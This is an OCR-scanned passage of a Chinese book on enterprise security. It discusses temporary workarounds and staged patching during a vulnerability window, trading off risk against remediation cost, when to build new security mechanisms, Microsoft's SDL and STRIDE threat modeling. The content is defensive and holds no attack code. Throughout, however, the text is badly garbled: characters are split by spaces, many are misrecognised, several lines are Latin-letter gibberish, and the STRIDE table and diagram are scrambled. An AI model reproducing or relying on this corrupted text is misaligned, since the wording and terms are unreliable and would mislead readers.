换 到 公有 云 给 租户 用 的 环境 ， 这 样 干 就 不 合适 了 ， 你 还 是 应 该 提供 跟 业 
界 兼 容 的 标准 运 维 环境 ， 在 标准 运 维 环境 之 上 提供 额外 的 保护 。 





3. 跨 时 间 轴 的 场景 


对 于 涉及 跨 时 间 维 度 的 防护 ，— 典 型 的 场景 包括 shellshock 这 样 的 漏 














WARN, A) 商 在 第 一 时 间 分 析 漏 洞 评估 影响 ， 这 种 影响 是 多 层面 

的 ， 不 只 是 说 可 能 拿 到 什么 权限 ， 还 包括 影响 线 上 系统 的 哪些 组 件 ， 这 
些 组 件 的 实时 在 线 要 求 ， 修 复 漏洞 会 不 会 导致 天 联 服务 不 可 用 。 每 一 个 
汤 洞 修复 的 过 程 都 是 攻防 双方 和 时 间 赛 跑 ， 攻 击 者 尽量 在 厂商 没 有 修复 
之 前 寻找 利用 点 并 友 动 渗透 ， 而 厂商 尽 可 能 在 没 出 POC 时 赶紧 把 洞 补 

了 。 在 这 个 时 间 窗 口中 ， 甲 方 安全 团队 需要 考虑 的 束 是 跨 时 间 维 度 上 的 
布防 。 出 补丁 之 前 是 不 是 就 干 等 不 作为 呢 ， 显 然 不 是 的 ， 细 心 的 人 会 发 
现 老 牌 安全 公司 的 漏洞 通告 的 解决 方案 里 通常 都 会 有 一 条 ， 叫 作 “ 临 时 
规避 措施 ”， 经 验 不 足 的 团队 是 不 会 写 上 这 条 的 。 修 不 了 漏洞 时 可 以 采 
用 一 些 治标 的 补救 性 措施 ， 比 如 对 有 漏洞 的 页 面 做 访问 控制 ， 只 人 允许 有 
限 的 src.ip 访 问 ， 比 如 在 前 端的 WAF/IPS 设 备 上 加 规则 过 滤 对 应 的 恶意 请 
求 ， 或 者 临时 性 的 去 掉 一 些 权限 ， 或 者 干脆 关 掉 某 些 功能 ， 但 凡 你 想 得 
到 的 通 第 总 能 找到 临时 规避 方案 ， 即 便 是 有 了 补丁 升级 也 不 是 立即 完 成 
的 ， 在 大 型 互联 网 生产 网 络 里 ， 全 网 打 完 一 个 补丁 是 需要 不 少时 间 的 ， 

有 可 能 一 个 礼拜 都 弄 不 完 ， 而 且 修 复 过 程 中 要 考虑 服务 可 用 性 需要 使 用 
灰 度 和 深 动 升级 的 方法 ， 比 如 修复 前 先 把 负载 均衡 上 的 流量 切换 到 备用 
节点 ， 然 后 对 坐 节 氮 的 服务 器 打 补 丁 ， 打 完 再 把 流量 切 回 去 ， 然 后 对 备 
用 布点 的 服务 器 打 补 丁 .…... 打 完 补丁 后 把 临时 防御 措施 再 “ 回 深 * 掉 (有 
价值 的 保留 ， 核 心 设备 上 不 建议 留 太 多 胱 肿 的 规则 〉， 然 后 把 特征 加 入 
全 流量 和 主机 IDS。 回 顾 整 个 时 间 轴 的 防护 措施 依次 是 : 临时 性 规避 措 
施 一 push 补 丁 / 根 治 措施 一 取消 临时 性 措施 一 添加 第 态 性 的 特征 检测 措施 






































一 检测 到 漏网 之 鱼 一 继续 上 述 过 程 ， 这 个 过 程 离 最 佳 实践 实际 上 还 差 了 
一 个 环节 ， 不 过 这 里 只 是 用 来 说 明 开 头 提 到 的 那个 问题 故而 不 展开 了 ， 
后 面 会 介绍 对 于 一 个 漏洞 修复 是 否 需要 上 升 层次 的 问题 。 








4. 风 险 和 影响 的 平衡 


假如 你 遇 到 一 个 安全 问题 是 这 样 的 : vlan 数目 不 够 ，vxlan 又 不 可 
用 ， 提 交 问 题 后 研发 的 反馈 的 方案 A 是 如 果 要 彻底 修复 则 需要 新 增 一 个 
dhcpd 的 安全 功能 大 约 包含 10000 doc) 即 1 万 行 代码 ， 此 时 产品 线 又 处 
于 整体 加 班 加 点 赶 工大 版 本 的 状态 ， 有 人 提出 了 方案 B 做 IP/MAC 双 向 绑 
定 的 缓解 性 措施 ， 但 这 样 的 结果 很 可 能 是 客户 觉得 太 麻 烦 ， 而 且 配 置 一 
多 容易 出 错 ， 此 时 你 想到 了 一 个 折 中 的 办 法 方案 C: 给 大 客户 单独 
vlan， 若 干 小 客户 共享 一 个 vlan， 这 样 的 好 处 是 不 需要 太 多 成 本 ， 风 险 
降低 到 可 控 ， 客 户 可 以 接受 。 如 果 选 择 方案 A 是 不 是 更 好 ? 这 个 要 看 ， 
假如 这 1 万 行 代码 只 是 用 来 临时 的 解决 这 个 问题 ， 显 然 ROI 比 较 低 ， 但 
是 如 果 后 续 的 版 本 本 来 就 要 加 入 这 个 功能 ， 不 妨 考虑 一 下 。 又 如 果 后 续 
版 本 不 需要 这 个 小 众 的 功能 ， 研 发 心里 其 实 本 不 打算 去 开发 的 ， 说 不 定 
下 次 告诉 你 说 要 2 万 行 代码 ， 然 后 你 到 CTO 那 里 也 说 不 清风 险 到 底 多 么 
严重 ， 就 会 陷入 僵局 。 风 险 缓解 的 原则 是 在 以 下 三 者 之 间 做 最 大 平 
衡 1) 风险 暴露 程度 : 2〉 研 发 运 维 变更 成 本 ; 3) 用 户 体验 的 负面 影 
响 。 


























5. 修 复 成 本 的 折 中 


一 个 安全 漏洞 的 修复 如 果 研 发 说 要 开 肥 一 周 ， 男 外 一 个 方案 是 运 维 
改 一 个 服务 器 配置 ， 而 你 其 实心 里 知道 在 WAF 上 加 条 规则 就 能 过 涯 ， 
只 不 过 你 怕 被 绕 过 心里 对 这 个 措施 不 是 特别 有 底气 。 对 于 这 个 场景 我 也 
不 打算 直接 给 出 答案 ， 但 通 音 情 况 下 改 产 品 的 成 本 是 最 高 的 ， 成 本 最 高 
的 往往 不 容易 推动 ， 推 不 动 就 无 法 落地 ， 最 后 就 是 一 堆 安 全 问题 。 





Amazon 有 一 个 研发 理论 ， 用 一 种 T-Shirt Size 估 计 的 方式 来 做 项 
目 。 产 品 经 理会 对 每 一 条 需求 评估 上 业务 影响 力 的 尺寸 ， 如 : XXXL 影 
响 一 千 万 人 以 上 或 是 可 以 占 到 上 亿美 金 的 市 场 ，XXL 影 响 百 万 用 户 或 是 
占 了 千 万 金 级 别 以 上 的 市 场 ， 后 面 还 有 XL、L、M、S， 这 样 逐 级 减 
小 。 开 发 团队 也 一 样 ， 要 评估 投入 的 人 员 时 间 成 本 ，XXXL 表 示 要 干 1 
年 ，XXL 干 半年 ，XL 干 3 个 月 ,LL 干 两 个 月 ，M 干 一 个 月 ，S 干 两 周 以 


下 。 等 等 。 

















于 和 是， 可 以 这 样 推理 : 





` 当 业务 影响 力 是 XL， 时 间 人 员 成 本 是 Ss， 这 是 最 高 优先 级 。 


` 当 业务 影响 力 是 M， 时 间 人 员 成 本 是 M， 这 是 低 优先 级 。 


` 当 业务 影响 力 是 $5， 时 间 人 员 成 本 是 XL， 直 接 人 砍 挥 这 个 需求 。 因 
为 是 亏 的 。 


` 当 业务 影响 力 是 XXL， 时 间 人 员 成 本 是 XXL， 需 要 简化 需求 ， 把 
需求 简化 成 YL， 时间 人 员 成 本 变 成 M 以 下 。 





安全 其 实 也 类 似 ， 风 险 和 修复 成 本 去 比较 ， 在 坚守 捕 线 的 基础 上 选 


综 上 所 述 ， 大 家 可 以 发 现 最 优 解 往往 不 一 定 是 最 安全 的 解 ， 市 场 上 
乙方 公司 渗透 测试 报告 中 提 的 修复 方案 有 些 也 是 无 法 实施 的 ， 很 多 批判 
企业 安全 做 得 不 好 的 帽子 们 ， 有 机 会 真 应 该 到 企业 里 体验 一 下 ， 企 业 安 
全 岂 是 找 洞 补 洞 这 么 简单 的 事 。 





参考 资料 


陈 卑 的 “加 班 与 效率 ”(http:Wcoolshell.cmarticles/10217.html#more- 
10217 ) 。 


3.6 ”需要 目 己 及 明 安 全 机 制 吗 


1. 安 全 机 制 的 含义 


首先 解释 一 下 发 明 安 全 机 制 这 句 话 的 意思 。 安 全 机 制 包括 : 常见 的 
对 称 和 非 对 称 加 密 算 法 ， 操 作 系 统 自 带 的 RBAC 基 于 角色 的 访问 控制 ， 
自 带 的 防火 墙 Netfilter，Android 的 基于 appid 隔 离 的 机 制 ，kernel 支 持 的 
DEP《〈 数 据 段 执行 保护 ) ， 以 及 各 种 ASLR《〈 地 址 空间 随机 映射 ) ， 各 
种 安全 函数 、 服 务 器 软件 的 安全 选项 ， 这 些 都 属于 已 经 存在 的 安全 机 
制 ， 注 意 我 用 的 词 是 “已 经 存在 ”， 而 这 个 话题 是 针对 是 不 是 要 在 已 有 的 
安全 机 制 上 再 去 发 明 新 的 安全 机 制 ， 比 如 三 星 手机 的 KNOX， 就 是 在 
Android 基 础 上 自己 造 了 个 轮子 。 














2. 企 业 安 全 建设 中 的 需求 





企业 安全 的 日 第 工作 是 不 是 也 会 面临 自己 去 发 明 安全 机 制 的 需求 ? 
会 ， 但 是 不 毅 见 。 实 际 上 ， 在 日 冲 中 发 生 的 绝 大 多 数 问题 都 属于 对 现 有 
安全 机 制 的 理解 有 误 、 没 有 启用 或 没有 正确 使 用 安全 机 制 而 导致 的 漏 
洞 ， 而 不 是 缺少 安全 机 制 ， 所 以 绝 大 多 数 场 景 都 不 需要 去 发 明 安 全 机 
制 。 发 明 安 全 机 制 是 需要 成 本 的 ， 且 需要 有 足够 的 上 自信， 人 否则 不 健全 的 
安全 机 制 消 耗 了 开发 的 人 力 又 会 引入 新 的 安全 问题 ， 但 此 话 不 绝对 。 














3. 





那 什 么 情况 下 应 该 发 明 安 全 机 制 呢 ， 这 其 实 非 党 考验 判断 者 的 技术 
实力 。 之 前 也 提 过 对 于 很 多 安全 漏洞 的 修复 是 人 否 要 上 升 层 次 的 问题 ， 首 
先 要 判断 这 是 单个 问题 还 是 属于 一 类 问题 ， 如 果 是 前 者 ， 用 救火 的 方式 
堵 上 这 个 洞 残 好 ， 没 必要 再 去 考虑 更 多 。 但 假如 这 是 一 类 问题 ， 而 你 叉 
没 提出 通 杀 这 一 类 问题 的 手段 束 会 永远 处 于 救火 之 中 ,疲于奔命 。 如 果 
古 一 类 问题 ， 分 儿 种 情况 。 第 一 种 归 入 安全 编程 能 力 不 足 导致 的 安全 问 
题 ， 这 类 问题 不 需要 通过 导入 新 机 制 解决 ， 而 是 通过 加 强 SDL 的 茶 些 环 
节 ， 加 强 培训 教育 去 解决 。 第 二 种 情况 则 是 属于 在 相应 的 领域 还 没有 成 
部 的 安全 解决 方案 或 者 现 有 的 安全 机 制 对 抗 强度 太 弱 ， 则 可 以 考虑 目 己 
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Lean 7h eR UE CE ak, TER A EAR TL BO EF 
发 ， 平 时 开发 过 程 中 已 经 大 量 的 使 用 了 安全 函数 ， 尼 用 了 编译 的 安全 选 
项 ， 除 了 给 这 个 函数 加 一 个 条 件 判 断 修 复 这 个 bug 外 是 不 是 还 要 考虑 更 
进 一 层 的 防护 呢 ? 大 多 数 情况 下 显然 是 没 必要 的 ， 假 如 这 是 一 个 公共 函 
数 ， 那 你 可 以 选择 把 修复 后 的 代码 封装 成 安全 的 API， 避 免 其 他 程序 员 
目 己 实现 的 时 候 发 生 同 类 问题 。 














换个 问题 ， 如 果 公 司 产 品 的 茶 个 私有 协议 总 是 被 人 频繁 地 解密 和 利 
用 ， 而 这 种 解密 对 产品 的 影响 又 较 大 ， 假 设 就 是 游戏 客户 端 跟 服 务 问 通 





信 的 指令 都 能 被 破解 和 仿冒 ， 那 这 种 情况 下 就 需要 考虑 是 售 更 改 或 创建 
安全 机 制 ， 即 有 没有 必要 通过 实现 更 强 的 通信 协议 加 密 或 提高 客户 端 反 
调试 的 对 抗 等 级 来 缓解 这 一 问题 。 








如 果 你 说 新 建安 全 机 制 也 是 补 洞 的 话 ， 其 实 也 没 错 ， 就 像 DEP 相 对 
于 用 户 态 的 程序 而 言 是 一 种 机 制 ， 而 对 于 操作 系统 和 冯 : 诡 依 曼 体系 结 
构 而 言 是 一 个 洞 。 当 你 过 于 勤奋 地 在 很 微观 的 细节 上 补 调 却 总 是 补 不 完 
的 时 候 ， 不 妨 停 下 来 看 看 能 人 否 在 更 高 更 抽象 的 层次 上 打 个 补丁 。 








安全 工程 师 如 果 要 普 升 为 Leader 很 重要 的 一 氮 就 是 对 安全 事件 和 安 
全 漏洞 的 抽象 能 力 ， 没 有 抽象 融 谈 不 上 PDCA， 就 意味 着 更 高 的 管理 者 
对 安全 KPI 在 你 手 上 能 人 否 改进 不 一 定 有 信心 。 在 纵深 防御 体系 癌 中 高 阶 
段 发 展 时 ， 实 际 上 会 比较 多 的 遇 到 是 否 要 创新 安全 机 制 的 问题 ， 但 是 这 
个 场景 大 多 数 公司 未 必 会 遇 到 。 














3.7 ”如 何 看 待 SDL 


SDL 安全 开发 生命 周期 ) 优 化 模型 如 图 3-1 所 示 。 





图 3-1 ”SDL 优 化 模型 


SDL 起 源 于 微软 ，2004 年 将 SDL 引 入 其 内 部 软件 开发 流程 中 ， 目 的 
是 减少 其 软件 中 的 漏洞 数量 和 降低 其 严重 级 别 。SDL 侧 重 于 长 期 维护 、 
流程 改进 并 能 够 帮助 开发 过 程 应 对 不 断 变化 的 威胁 状况 。 早 些 年 微软 的 
产品 安全 问题 比较 多 ， 微 软 在 某 一 年 甚至 下 令 所 有 产品 线 开 发 计划 停止 
半年 ， 全 部 用 于 整顿 安全 问题 。 起 初 SDL 适 用 于 传统 的 瀑布 模型 和 螺旋 
式 开 发 ， 到 了 2010 年 SDL 增 加 了 敏捷 的 部 分 改进 ， 用 于 应 对 互联 网 下 的 





Web 开 发 ， 目 前 SDL 的 “全 貌 ” 如 图 3-2 所 示 。 


确定 安全 要 求 确定 设计 要 求 使 用 批准 的 工具 ， 动态 分 析 ”事件 响应 计划 
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图 3-2” SDL 整体 框架 


基本 软件 安全 培训 应 涵盖 的 基础 概念 如 下 所 示 。 


安全 设计 ， 包 括 以 下 主题 : 


` 减 小 攻击 面 


深度 防御 


最 小 权限 原则 


安全 默认 设置 


-威胁 建 模 ， 包 括 以 下 主题 : 


-威胁 建 模 概述 


威胁 模型 的 设计 意义 


基于 威胁 模型 的 编码 约束 


安全 编码 ， 包 括 以 下 主题 : 


-缓冲 区 湾 出 《对 于 使 用 C 和 C++ 的 应 用 程序 ) 


整数 算法 错误 〈 对 于 使 用 C 和 C++ 的 应 用 程序 ) 


- 跨 站 点 脚本 《对 于 托管 代码 和 Web 应 用 程序 ) 


.SQL 注入 《对 于 托管 代码 和 Web 应 用 程序 ) 


. 弱 加 密 


安全 测试 ， 包 括 以 下 主题 : 


安全 测试 与 功能 测试 之 间 的 区 别 


风险 评估 


安全 测试 方法 


隐私， 包括 以 下 主题 : 


隐私 敏感 数据 的 类 型 





隐私 设计 最 佳 实践 


风险 评估 


隐私 开发 最 佳 实践 


隐私 测试 最 佳 实践 





局 级 概念 方面 的 培训 ， 包 括 但 不 限于 以 下 方面 : 


高 级 安全 设计 和 体系 结构 


可 信用 户 界 面 设 计 


安全 漏洞 细 市 





实施 自 定 义 威胁 缓解 





先 看 这 份 培训 列表 。 能 把 这 些 彻底 讲 明 白 的 人 其 实 还 是 资深 工程 师 
以 上 的 人 。 有 人 可 能 觉得 我 说 的 夸张 了 ， 原 因 在 于 大 部 分 互联 网 公司 的 
研发 环境 主要 是 web， 有 很 多 人 能 把 SQL 注入 、XSS、CSRF 这 些 讲 清 
楚 ， 但 问题 是 这 样 束 算 SDL 了 人 么 ? 非 也 ， 当 下 热闹 的 安全 大 会 各 种 讲 攻 
防 的 议题 ， 但 这 些 离 真 正 的 产品 安全 设计 还 差 很 远 ， 行 业 的 普遍 现状 是 
能 做 入 侵 检 测 ， 能 把 漏洞 修补 原理 说 清楚 ， 但 很 少 有 人 能 把 安全 架构 设 
计 非 常 体系 化 的 讲 清楚 。 很 多 人 认为 SDL 在 互联 网 公司 无 法 完全 落地 的 
原因 是 因为 DevOps 模 式 下 的 频 壹 交付 导致 SDL 显 得 过 于 “厚重 *”， 我 觉得 
这 只 说 对 了 一 半 ， 根 据 大 多 数 互 联网 公司 现行 的 模式 ， 我 加 了 一 个 帆 


























子 ， 寻 且 束 叫 “ 攻 防 驱 动 修改 * 吧 。 


3.7.1 ”攻防 驱动 修改 


大 多 数 甲 方 安全 团队 所 做 的 工作 实际 上 处 于 这 个 维度 。 通 过 对 已 知 
的 攻击 手段 ， 例 如 SQL 注入 ，XSS 等 建立 事前 的 安全 编码 标准 ， 并 在 发 
布 前 做 代码 审计 、 渗 透 测 试 和 提出 漏洞 修补 方案 。 这 种 模式 的 显著 优点 
是 针对 性 比较 强 ， 直 入 主题 ， 见 效 快 。 








简单 的 流程 + 事件 驱动 型 构成 了 这 种 日 第 行为 的 本 质 ， 简 单 的 流程 
通常 包括 : 


事前 基线 : Web 安 全 编码 标准 ， 各 公司 内 部 范围 流传 的 APP 应 用 安 
全 设计 文档 ， 这 个 文档 的 质量 水 平 通常 可 以 差 很 远 ， 当 然 文 档 永 远 只 是 
文档 ， 可 能 就 是 开发 部 门 不 强制 不 考试 800 年 部 不 看 的 东西 。 


事 中 措施 ， 代 码 审计 ， 发 布 前 过 一 轮 扫 措 器 + 渗透 测试。 


.事后 机 制 : HTTP 全 流量 IDS，Web 日 志 大 数据 分 析 ， 等 等 。 


事件 驱动 : 发 现 了 新 的 安全 问题 就 “事后 诸葛 亮 一 把 ”， 做 点 补救 
性 措施 。 





从 整个 过 程 看 ， 攻 防 驱 动 修改 比较 偏 “ 事 后 "， 相 对 于 完整 的 SDL， 


威胁 建 模 等 工作 而 言 ， 它 似乎 不 用 发 散 精力 投入 太 多 束 能 禾 凋 已 知 的 攻 
击 点 ， 而 且 在 研发 侧 不 用 面 对 比 较 大 的 “推动 SDL 沙 地 的 压力 ” 





但 是 它 的 缺点 也 是 显而易见 的 ， 由 于 过 程 方法 论 的 施 力 点 的 比较 偶 
事后 ， 所 以 在 从 源头 上 发 现 和 改进 问题 的 能 力 不 足 ， 弱 于 在 产品 内 建 的 
安全 机 制 上 建立 纵深 防御 ， 被 线 过 的 可 能 性 比较 大 ， 事 后 的 bug 率 到 一 
定 程度 就 很 难 再 改善 ， 只 能 通过 不 断 的 攻防 对 抗 升级 去 事后 修补 。 笼 统 
一 点 讲 就 是 考虑 不 够 系统 性 。 这 跟 当 前 安全 行业 缺少 真正 的 安全 架构 设 
计 人 才 有 关 ， 攻 防 的 声音 铺天盖地 ， 跟 国外 比 一 下 在 设计 和 工程 化 方面 
差距 不 小 。 











事后 修补 是 不 是 总 是 有 效 的 ， 颖 缝补 补 的 感觉 你 觉得 会 如 何 呢 ， 对 
于 公司 的 边缘 性 产品 你 可 以 希望 它 早 日 归 入 历史 的 人 尘埃， 而 对 于 公司 的 
文 柱 型 产品 你 只 能 寄 希 望 于 某 一 个 大 版 本 更 新 时 把 茶 些 机 制 推倒 重新 来 





3.7.2 SDL 落 地 率 低 的 原因 


1.DevOps 的 交付 模式 


互联 网 频繁 的 迭代 和 发 布 ， 不 同 于 传统 的 软件 开发 过 程 。 如 果 一 个 
软件 要 一 年 交付 ， 那 么 在 前 期 抽出 2~4 周 做 安全 设计 也 可 以 接受 ， 但 在 
互联 网 交付 市 奏 下 ， 可 能 一 周到 一 个 月 就 要 发 布 版 本 ， 你 可 能 没有 足够 





的 时 间 去 思考 安全 这 件 事 。 对 于 SDL 会 拖 慢 整 个 发 布 节奏 这 个 问题 上 ， 

安全 团队 去 推动 也 会 直面 公司 管理 层 和 研发 线 的 挑战 。 不 过 当 你 有 经 验 
丰富 的 安全 人 员 和 上 自动 化 工具 文 持 时 ，SDL 在 时 间 上 是 可 以 大 大 缩短 

的 。 








2. 历 史 问 题 


99% 的 甲 方 安全 团队 的 工作 都 是 以 救火 方式 开始 ，SDL 从 来 都 不 是 
安全 建设 第 一 个 会 想到 的 事情 ， 而 且 业内 心照 不 宣 的 一 个 原因 是 , “E 
前 用 不 上 力 ， 侦 事后 风格 的 安全 建设 ?贯穿 于 大 多 数 安全 团队 的 主线 。 
之 所 以 如 此 ， 原 因 是 第 一 有 火 必 救 ， 有 的 团队 救火 上 着， 有 的 则 能 抽 号 
转 问 系统 性 建设 ， 第 二 想 在 事前 用 力 ， 需 要 自己 足够 强大 ， 能 摆平 研 
发 ， 不 够 强大 就 会 变 成 良 人 目 扰 ， 目 讨 没 趣 ， 还 不 如 回避 。 








3. 业 务 模 式 


大 多 数 平台 级 互联 网 公司 的 开 及 以 Web 为 主 ， 超 大 型 互联 网 公司 才 
会 进入 底层 架构 造 轮子 的 阶段 ， 而 对 于 以 Web 产 品 为 主 的 安全 建设 ， 第 
一 是 事后 修补 的 成 本 比较 低 ， 屡 试 不 磷 ; 第 二 是 部 分 产品 的 生命 周期 不 
长 ， 这 两 点 一 定 程度 上 会 让 很 多 后 加 入 安全 行业 的 新 同学 认为 “ 救 
火 ”=“ 安 全 建设 "。 但 是 在 甲 方 待人 了 的 人 一 定 会 发 现 ， 哪 但 是 web， 只 
要 系统 比较 大 ， 层 层 供 套 和 不 同 子 系统 间 的 接口 调用 ， 会 使 得 茶 些 安全 
问题 的 修补 成 为 疑难 病症 ， 可 能 束 是 设计 之 初 没有 考虑 安全 ， 人 致使 问题 














不 能 得 到 根治 。 时 间 一 入 ， 技 术 债 越 积 越 多 ， 大 家 最 后 一 致 于 认 这 个 问 
题 没 法 解决 。 


4.SDL 的 门槛 





其 实 SDL 是 有 门 覃 的， 而且 还 不 低 。 基 重要 有 两 点 : 第 一 点 是 安全 
ERD, IRE RELVES LA TET A, EER UE CTT 
所 以 现实 往往 是 很 多 安全 团队 能 指导 研发 部 门 修 复 漏 洞 ， 但 可 能 没 意 识 
到 其 实 缺 少 指导 安全 设计 的 积累 ， 因 为 安全 设计 是 一 件 比 漏洞 修复 门槛 
更 高 的 事 。 看 业内 很 多 技术 不 错 的 安全 研究 者 ， 写 的 文章 ，1 
漏洞 分 析 很 给 力 ， 但 到 了 安全 建议 环节 好 像 就 沉 得 少 了 点 什么 。 第 二 后 
是 工 具 文 持 少 ， 静 态 代 人 码 扫描 、 动 态 Fuzz 等 ， 工 欲 善 其 事 必 移 利 其 器 ， 
Facebook 宣 称 其 最 好 的 程序 员 是 投入 到 工具 开发 的 ， 而 对 于 国内 很 多 安 
全 团队 而 言 ， 最 好 的 人 都 不 会 用 在 工具 开发 上 ， 而 是 奋斗 在 攻防 第 一 线 
做 救火 队长 。 稍 微 好 一 点 的 情况 是 这 帮 人 投入 在 做 安全 机 制 建设 上 ， 而 
业务 部 门 也 不 会 来 帮助 安全 团队 开 友 安全 工具 。 这 还 跟 公司 整 体 上 是 否 
重视 上 自动 化 测试 有 关 ， 如 果 公 司 在 测试 领域 的 实践 没有 做 到 很 前 沿 ， 那 
么 安全 的 黑白 盒 测 试 也 不 会 注重 工具 化 建设 ， 代 码 履 蓄 率 和 路 径 深 上 度 等 
更 加 不 会 有 人 去 关注 了 。 实 际 上 不 一 定 要 在 这 个 场景 下 自己 去 造 轮子 ， 
用 商业 工具 是 不 错 的 选择 。 
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3.7.3 ”因地制宜 的 SDL 实 号 


1. 重 度 的 场景 





对 于 公司 内 研发 的 偏 奔 层 的 大 型 软件 ， 达 代 周 期 较 长 ， 对 架构 设计 
要 求 比较 全 面 ， 后 期 改动 成 本 大 ， 如 果 安 全 团队 人 手 够 的 话 ， 这 种 场景 
应 该 尽量 在 事前 切入 ， 在 立项 设计 阶段 就 应 该 进行 安全 设计 和 威胁 建 模 
等 工作 。 相 比 在 事后 贴 狗 皮 请 药 ， 这 种 事前 的 时 间 投 入 是 值得 的 ， 门 槛 


主要 还 是 人 。 








对 于 较 大 软件 的 “大 版 本 >”， 包 括 每 个 产品 初始 版 本 ， 还 比如 标杆 产 
品 的 1.0 到 2.0 类 似 这 种 里 程 碑 式 的 版 本 发 布 ， 修 改 和 增加 了 很 多 功能 
点 ， 其 至 修改 了 底层 的 通信 协议 ， 这 种 也 需要 较 完 整 的 SDL， 当 然 这 种 
版 本 跳跃 有 时 候 只 是 对 外 的 一 种 营销 手段 ， 不 一 定 是 技术 上 的 大 修改 ， 


这 个 束 要 看 实际 情况 了 。 








2. 轻 度 的 场景 


对 于 架构 简单 、 开 发 周期 短 、 交 付 时 间 要 求 比较 紧 的 情况 ， 显 然 完 
整 的 SDL 束 太 重度 了 ， 这 个 时 候 ， 攻 防 驱 动 修改 束 足 以 解决 问题 。 


其 他 的 诸如 小 版 本 发 布 ， 技 术 上 没有 大 的 修改 ， 也 没 必 要 去 跑 全 量 
SDL， 人 否则 就 太 教 条 和 僵化 了 。 


3.7.4 _ SDL 在 互联 网 企业 的 发 展 





目前 SDL 在 大 部 分 不 太 兰 钱 的 互联 网 企业 属于 形式 上 都 有 ， 但 落地 
的 部 分 会 比较 粗糙 。 通 常 只 有 一 两 个 环节 。 最 主要 的 瓶颈 还 是 人 和 工具 
的 缺失 。 以 前 互联 网 企业 只 生产 Web， 攻 防 驱 动 修改 得 以 应 付 ， 但 是 现 
在 大 型 的 互联 网 企业 不 再 只 生产 Web， 而 是 会 自己 生产 诸如 分 布 式 数据 
库 、 浏 览 器 、 手 机 操作 系统 这 样 的 大 型 软件 ， 单 纯 的 攻防 驱动 修改 已 经 
日 渐 乏 力 ， 没 有 足够 的 安全 设计 能 力 将 无 法 应 对 未 来 的 威胁 。 因 此 推测 
以 后 的 安全 行业 中 ， 设 计 方 面 的 人 才 会 严重 缺失 ， 大 部 分 甲 方 安全 团队 
仍然 游离 在 设计 的 大 门 之 外 ， 只 有 一 些 大 型 厂商 正在 借 研究 之 名 来 做 一 
些 改进 安全 设计 的 工作 ， 期 待 这 些 大 型 广 商 们 能 市 一 带 团队 ， 给 这 个 行 
业 培 养 一 些 生 力 军 。 











SDL 除 了 最 早 基于 传统 瀑布 模型 的 版 本 ， 以 及 为 DevOps 优 化 的 版 
本 ， 实 际 上 在 实践 阶段 还 可 以 优化 成 极速 发 布 的 版 本 ， 或 者 干脆 不 奶 求 
SDL 而 从 其 他 的 维度 来 弥补 SDL 不 健全 的 问题 ， 其 实现 的 本 质 是 原来 的 
SDL 对 研发 流程 的 修改 有 点 像 阻 塞 式 IO 模型 ”， 而 现在 可 以 通过 工具 和 
技术 手段 使 其 变 成 “异步 IO 模 型 "， 从 更 高 维度 补贴 SDL 的 思路 在 这 里 不 
再 展开 ， 后 续 会 在 笔者 博客 上 专题 分 译 。 





参考 资料 


微软 SDL 白 皮 书 : https://www.microsoft.com/zh- 


cn/download/details.aspx?id=12379 


3.8 STRIDE 威 胁 建 模 





STRIDE 是 微软 开发 的 用 于 威胁 建 模 的 工具 ， 或 者 是 说 一 套 方法 论 
吧 ， 它 把 外 部 威胁 分 成 6 个 维度 来 考察 系统 设计 时 存在 的 风险 点 ， 这 6 个 
维度 首 字母 的 缩写 就 是 STRIDE， 分 别 为 :Spoofing (KA) ~ 
Tampering (427%) ~ Repudiation (Å) 、Information Disclosure( 信 
itis) ~ Denial of Service《〈 拒 绝 服务 ) 和 Elevation of Privilege (权限 
提升 ) ， 如 表 3-1 所 示 。 


表 3-1 STRIDER ER 























属性 威胁 定义 例子 
a Spoofing (假冒 ) 冒充 某 人 或 某 物 {RA bille, microsoft.com 或 ntdll. 
认证 
ss Tampering ( 算 改 ) 修改 数据 和 代码 修改 一 个 DLL ， 或 一 个 局 域 网 
的 封包 
Repudiation (和 否认) 宣称 未 做 过 某 个 行为 “我 没有 发 送 email” “RRA 
不 可 抵赖 性 修改 文件 "“ 我 肯定 没有 访问 那个 
机 密 性 Information Disclosure ( 信 暴露 信息 给 未 经 授权 的 允许 某 人 阅读 Windows 源 代 
息 泄露 ) 访问 者 码 ; 将 客户 列表 发 布 在 网 站 上 
Denial of Service (拒绝 服务 )| ”使 对 服务 对 用 户 拒 绝 访 | 发 送 数据 包 使 目标 系统 CPU 
可 用 性 问 或 降级 满 负荷 或 发 送 恶 意 代码 使 目标 服 
Elevation of Privlege (权限 未 经 授权 获取 权限 远程 用 户 执行 任意 代码 ， 普 通 
授权 提升 ) 用 户 可 以 执行 管理 员 私 有 的 系统 
B 





STIRDE 如 何 使 用 ? FC BA DFD) 用 图 形 方式 表示 
系统 ，DFD 使 用 一 组 标准 符 写 ， 其 中 包含 四 个 元 系 : 数据 流 、 数 据 存 


储 、 进 程 和 交互 方 ， 对 于 威胁 建 模 ， 另 外 增加 了 一 个 元 素 ， 即 信任 边 

界 。 数 据 流 表示 通过 网 络 连 接 、 命 名 管道 、 消 中队 列 、RPC 通 道 等 移动 
的 数据 。 数 据 存储 表示 文本 、 文 件 、 关 系 型 数据 库 、 非 结构 化 数据 等 。 
进程 指 的 是 计算 机 运行 的 计算 或 程序 。 然 后 对 每 一 个 节点 元 系 和 过 程 进 
行 分 析 判 断 是 否 存 在 上 述 6 种 威胁 ， 并 制定 对 应 的 风险 缓解 措施 。 例 如 
图 3-3 所 示 的 情况 。 


| EAR 
系统 列表 
| 











销售 001 


销售 NNW 


客户 信任 边界 服务 只 


(1) 销售 001 一 收集 和 分 析 过 程 
O 销售 团队 系统 列表 一 收集 和 分 析 过 程 
O 收集 和 分 析 过 程 一 分 析 过 程 


图 3-3 STRIDER {f 





图 中 ， 中 、 包 、 鲜 其实 都 存在 假冒 、 自 改 、 拒 绝 服务 的 风险 ， 所 以 
在 这 些 环节 都 需要 考虑 认证 、 鉴 权 、 加 密 、 输 入 验证 等 安全 措施 。 但 根 
据 风险 的 不 同 ， 过 程 @ 在 内 网 的 服务 器 被 拒绝 服务 的 风险 较 小 ， 而 在 
Iternet 上 传输 的 过 程 中 所 受到 的 监听 和 自 改 的 风险 更 大 ， 所 以 在 每 个 环 
节 上 采取 的 风险 削减 措施 的 力度 会 不 一 样 ， 这 实际 上 也 是 什么 安全 措施 
一 定 要 落地 、 什 么 安全 措施 可 以 适当 妥协 的 一 个 参考 视角 。 很 多 安全 从 
业者 所 接受 的 安全 认 知 往往 是 进入 一 家 企业 后 ， 拿 到 一 份 名 为 应 用 开发 
